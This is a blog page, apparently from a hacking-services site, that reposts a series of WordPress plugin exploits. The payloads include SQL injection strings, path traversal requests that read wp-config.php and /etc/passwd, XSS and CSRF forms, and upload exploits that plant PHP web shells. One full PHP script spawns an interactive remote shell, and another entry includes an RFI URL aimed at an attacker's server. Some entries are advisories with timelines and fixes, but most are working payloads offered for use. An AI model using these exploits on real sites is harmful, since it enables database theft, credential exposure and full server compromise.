Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138758

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Exploit Title: Hospital Management System for Wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student members to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
# 
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
# 
# Etc..
# # # # #
HireHackking 
# Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File
Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

I-Description:
Wordpress history collection plugin contains a file called download.php
which is not filtering the GET input, it then uses this get input value to
force the download of a file.
(download.php, line 44):
header("Content-Disposition: attachment;
filename=\"".basename($filename)."\";" );
2:Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
;"

Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
HireHackking 
Title: Helpful 2.4.11 Sql Injection  - Wordpress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle


core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );

// set args for insert command
$args = array(
'post_id' => $_REQUEST['post_id'],
'user' => $_REQUEST['user'],
'pro' => $_REQUEST['pro'],
'contra' => $_REQUEST['contra']
);
$result = $this->insert( $args );

@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->

if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");



Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1
HireHackking 
source: https://www.securityfocus.com/bid/69105/info

The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

HDW Player 2.4.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12
HireHackking 
source: https://www.securityfocus.com/bid/53967/info

HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

HD FLV Player 1.7 is vulnerable; other versions may also be affected. 

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.jpg";
$ch = 
curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('myfile'=>"@$uploadfile",
                'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : 
http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg
Filename : [CTRL-u] PostShell.php after executed

lo.php.jpg
<?php
phpinfo();
?>
HireHackking 
# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
# Exploit Author: CrashBandicot
# Date: 2016-03-22
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
# Tested on: MSWin32
# Version: 1.0.0

# Vuln file : gallery/audio-download.php

11.   if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
13.       $file_size =  $_REQUEST['file_size'];
15.       $file =  $_REQUEST['file_path'];
17.       $filename = basename($file);
....
55.         Header("Content-Disposition: attachment; filename='" . $filename . "'");


# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10


# 22/03/2016 - Informed Vendor about Issue
HireHackking 
Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code. 

Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise. 


-----------------------------------------------------------------------------------------------

Solution:

Update to Gwolle Guestbook 1.5.4

More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin.
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
<?php
/****************************************************************************************************************************
   *
	* Exploit Title        : Gravity Forms [WP] - Arbitrary File Upload
	* Vulnerable Version(s): 1.8.19 (and below)
	* Write-Up             : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
	* Coded by             : Abk Khan [ an0nguy @ protonmail.ch ]
  *
*****************************************************************************************************************************/
error_reporting(0);

echo "
   _____                 _ _         ______    _ _     
  / ____|               (_) |       |  ____|  | | |    
 | |  __ _ __ __ ___   ___| |_ _   _| |__ __ _| | |___ 
 | | |_ | '__/ _` \ \ / / | __| | | |  __/ _` | | / __|
 | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
  \_____|_|  \__,_| \_/ |_|\__|\__, |_|  \__,_|_|_|___/
                                __/ |                  
                               |___/     > an Exploiter by AnonGuy\n";
$domain    = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
$url       = "$domain/?gf_page=upload";
$shell     = "$domain/wp-content/_input_3_khan.php5";
$separator = '-------------------------------------------------------------------';

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, '"ok"') !== false) {
    echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
    while ($testCom != 'exit') {
		$user    = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
		$b0x     = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
        echo "$user@$b0x:~$ ";
        $handle  = fopen("php://stdin", 'r');
        $testCom = trim(fgets($handle));
        fclose($handle);
        $comOut  = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
        echo $comOut;
    }
}
else {
	die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}

function get_string_between($string, $start, $end)
{
    # stolen from stackoverflow!
    $string = ' ' . $string;
    $ini    = strpos($string, $start);
    if ($ini == 0)
        return '';
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
?>
HireHackking 
source: https://www.securityfocus.com/bid/53511/info

The GRAND Flash Album Gallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

GRAND Flash Album Gallery 1.71 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/51012/info

GRAND FlAGallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

GRAND FlAGallery 1.57 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss]
HireHackking 
=============================================
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

II. BACKGROUND
-------------------------
Hassle-free and user-friendly way to add a Media player directly to your
website.

III. DESCRIPTION
-------------------------
This bug was found in the file:

/gracemedia-media-player/templates/files/ajax_controller.php

Vulnerable code:

require_once($_GET['cfg']);

The parameter "cfg" it is not sanitized allowing include local files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-------------------------
The following URL have been confirmed that is vulnerable to local file
inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
GraceMedia Media Player <= 1.0

VII. SOLUTION
-------------------------
Disable plugin until a fix is available, vendor does not fix after 2
requests.

VIII. REFERENCES
-------------------------
https://es.wordpress.org/plugins/gracemedia-media-player/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
February 06, 2019 1: Initial release
March 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2019 2: Email to vendor without response
February 21, 2019 3: Second email to vendor without response
March 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
HireHackking 
<html>
    <!--

        GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi      
        CWE-434

        Vulnerable Fucntion: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
        
        Details:
        
          After checking file extention substring was used for file name to select first 95 letter line #5655
          So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
          will upload a file with .php extention in website :)

    -->

<body>

    <!--

        Replace http://127.0.0.1/wp/ with target wordpress website
        Fill id param in form action to any active download product

    -->

    <form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">

        <input type="file" name="gourlimage2" />
        <input type="submit"/>
        
    </form>

    <a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>

</body>

</html>
HireHackking 
[+] Exploit Title : Wordpress Googmonify Plug-in XSS/CSRF
[+] Exploit Author : Ehsan Hosseini
[+] Date: 2015-08-21
[+] Vendor Homepage : https://wordpress.org/plugins/googmonify/
[+] Software Link : https://downloads.wordpress.org/plugin/googmonify.zip
[+] Version : 0.8.1
[+] Tested On : Windows FireFox
[+] CVE : N/A

===============================
Vulnerable Code : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo $pid; ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo $limit;
?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo $aid; ?>">
===============================
Exploit 1 (Just CSRF):

<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden" value='Ehsan Hosseini'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value="Ehsan Hosseini">
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>

Exploit 2 (CSRF & XSS):

<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden"
value='"><script>alert(document.cookie)</script>'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value='"><script>alert(/Ehsan
Hosseini/)</script>'>
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>
===============================
Patch :  googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo
htmlspecialchars($pid); ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo
htmlspecialchars($limit); ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo
htmlspecialchars($aid); ?>">

===============================
Discovered By : Ehsan Hosseini.
HireHackking 
# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
# Date: 2019-07-02
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
# Version: 6.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : 

#POC :

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
&taction=edit HTTP/1.1

#SQLMAP Result :
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

# Changeset:
# Issue fixed in version 6.2
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=

Cheers!
PrincyEdward
HireHackking 
# Title: WordPress Google Map Plugin < 4.0.4 - SQL Injection
# Author: defensecode
# Date: 2018-06-12
# Software: WordPress WP Google Map plugin
# Version: 4.0.4 and below
# Vendor Status:  Vendor contacted, no response

# Vulnerability Description
# The easiest way to reproduce the vulnerabilities is to visit the
# provided URL while being logged in as administrator or another user
# that is authorized to access the plugin settings page. Users that do
# not have full administrative privileges could abuse the database
# access the vulnerabilities provide to either escalate their privileges
# or obtain and modify database contents they were not supposed to be
# able to.

# Due to the missing nonce token, the vulnerable code is also directly
# exposed to attack vectors such as Cross Site request forgery (CSRF).

# SQL injection
# Vulnerable Function:  $wpdb->get_results()
# Vulnerable Variable:  $_GET['order']
# Vulnerable URL:

http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc
PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)


# SQL injection
# Vulnerable Function:  $wpdb->get_results()
# Vulnerable Variable:  $_GET['orderby']
# Vulnerable URL:

http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc

# Disclosure Timeline
# 2018/05/11   Vulnerabilities discovered
# 2018/05/16   Vendor contacted
# 2018/06/08   No response
# 2018/06/12   Advisory released to the public
HireHackking 
# Exploit Title:  Plugin Google Drive for WordPress 2.2 – RCE – Unlik
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: *https://wordpress.org/plugins/wp-google-drive/
# Software Link: *https://wordpress.org/plugins/wp-google-drive/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.2
# Tested on: Ubuntu 16.1

1 - Description


   - Type user access: Don't need of login .
   - $_POST[‘file_name’] is not escaped.

2. Proof of Concept

1 - Send data form:

<form method="post"
      action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
   <input type="text" name="ajaxstype" value="del_fl_bkp">
   <input type="text" name="file_name" value="../../wp-config.php">
   <input type="text" name="id" value="1">
   <input type="submit">
</form>


#   - Date Discovery : *11/25/2017*
#   - Date Vendor Contact : *12/26/2017*
#   - Date Publish : 08/04/2018
#   - Date Resolution :
HireHackking 
Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection
Data : 2014 – 12 -03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip

1. Detail 
- Google Document Embedder v2.5.14 have SQL Injection
- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.
- but mysql_real_escape_string() function is bypass possible
- vulnerability file : /google-document-embedder/~view.php

================================================================
50	// get profile
51	if ( isset( $_GET['gpid'] ) ) {
52		$gpid = mysql_real_escape_string( $_GET['gpid'] );
		//mysql_real_escape_string() is bypass 
53		if ( $profile = gde_get_profile( $gpid ) ) {
54			$tb = $profile['tb_flags'];
55			$vw = $profile['vw_flags'];
56			$bg = $profile['vw_bgcolor'];
57			$css = $profile['vw_css'];
58		}
59	}
================================================================

===============================================================
373 function gde_get_profile( $id ) {
374	global $wpdb;
375	$table = $wpdb->prefix . 'gde_profiles';
376	
377	$profile = $wpdb->get_results( "SELECT * FROM $table WHERE 

profile_id = $id", ARRAY_A );
378	$profile = unserialize($profile[0]['profile_data']);
379	
380	if ( is_array($profile) ) {
381		return $profile;
382	} else {
383		return false;
384	}
385 }
================================================================

2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1

3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                 God2zuzu@naver.com
HireHackking 
# Exploit Title: Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection
# Software Link: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
# Version: <= 2.1.4
# Dork: N/A
# Author: Abdulazeez Alaseeri
# Tested on: linux/apache
# Type: Web App
# Date: 2020-11-12
# Category: Web App


================================================================
Unauthenticated SQL Injection in Good Layers LMS Plugin <= 2.1.4
================================================================

Plugin URL: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850

Following is the vulnerable code in file "goodlayers-lms/include/lightbox-form.php" from line 682 to 701
================================================================
Start Vulnerable Code
================================================================
682-	add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
683-	add_action( 'wp_ajax_nopriv_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
684-	function gdlr_lms_cancel_booking(){
685-		global $wpdb;
686-
687-		$sql  = 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment ';
688-		$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
689-		$sql .= '(payment_status=\'pending\' OR payment_status=\'submitted\' OR payment_status=\'reserved\')';
690-		$booked_course = $wpdb->get_row($sql);
691-		if( !empty($booked_course) ){
692-			$payment_info = unserialize($booked_course->payment_info);
693-
694-			$course_options = gdlr_lms_get_course_options($booked_course->course_id);
695-			$course_options['booked-seat'] = intval($course_options['booked-seat']) - intval($payment_info['amount']);
696-			update_post_meta($booked_course->course_id, 'gdlr-lms-course-settings', wp_slash(json_encode($course_options, JSON_UNESCAPED_UNICODE)));
697-
698-			$wpdb->delete( $wpdb->prefix . 'gdlrpayment', array('id'=>$_POST['id']), array('%d'));
699-		}
700-		die("");
701-	}
================================================================
End Vulnerable Code
================================================================
Line 682 means that function "gdlr_lms_cancel_booking" can be called using "/wp-admin/admin-ajax.php" by having any low privileged account such as subscriber or contributor. However the "nopriv" in line 683 means that the same function "gdlr_lms_cancel_booking" can also be called as an unauthenticated user. Following URL means that an attacker is already inside function "gdlr_lms_cancel_booking".

http://www.example.com/wp-admin/admin-ajax.php?action=gdlr_lms_cancel_booking

SQL Injection on line 688 is pretty simple to understand that an arbitrary user input in POST Request is sent straight into the MySQL Query as variable "id"

$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';

Following are the Request Headers as POC which demonstrates MySQL SLEEP Query.

================================================================
Request Headers Start
================================================================
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)
================================================================
Request Headers Finish
================================================================
HireHackking 
source: https://www.securityfocus.com/bid/65060/info

The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
HireHackking 
<!--
Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html

Abstract
It was discovered that the Global Content Blocks WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.

Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160712-0031

Tested versions
This issue was successfully tested on Global Content Blocks WordPress Plugin version 2.1.5.

Fix
There is currently no fix available.

Introduction
The Global Content Blocks WordPress Plugin lets users create their own shortcodes to insert reusable code snippets, PHP or HTML including forms, opt-in boxes, iframes, Adsense code, etc, into pages and posts as well as widgets and directly into php content. Global Content Blocks is affected by Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.

Details
The issue exists due to the fact that Global Content Blocks does not use the Cross-Site Request Forgery protection provided by WordPress. Actions with Global Content Blocks have a predictable format, thus an attacker can forge a request that can be executed by a logged in Administrator. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept
The following proof of concept will update/overwrite the content block with id 1. In order to run the attacker's PHP code, a page/blog needs to be viewed that contains this content block (eg, [contentblock id=1]).
-->

<html>
   <body>
      <form action="http://<target>/wp-admin/options-general.php?page=global-content-blocks" method="POST">
         <input type="hidden" name="gcb_view" value="update" />
         <input type="hidden" name="update_it" value="1" />
         <input type="hidden" name="gcb_name" value="Foo" />
         <input type="hidden" name="gcb_custom_id" value="" />
         <input type="hidden" name="gcb_type" value="php" />
         <input type="hidden" name="gcb_description" value="" />
         <input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
         <input type="hidden" name="gcb_updateshortcode" value="Update" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
HireHackking 
# Title: SQLi vulnerabilities in WordPress plugin "GigPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/gigpress/
# Active installs: 20,000+
# Vulnerable version: 2.3.8
# Fixed version: 2.3.9
# CVE: CVE-2015-4066

 Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89]
-------------------------------

* CODE:
admin/handlers.php:87
+++++++++++++++++++++++++++++++++++++++++
$show['show_tour_id'] = $_POST['show_tour_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:94
+++++++++++++++++++++++++++++++++++++++++
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
[............]
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_artist_id (POST)
   Type: error-based
   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
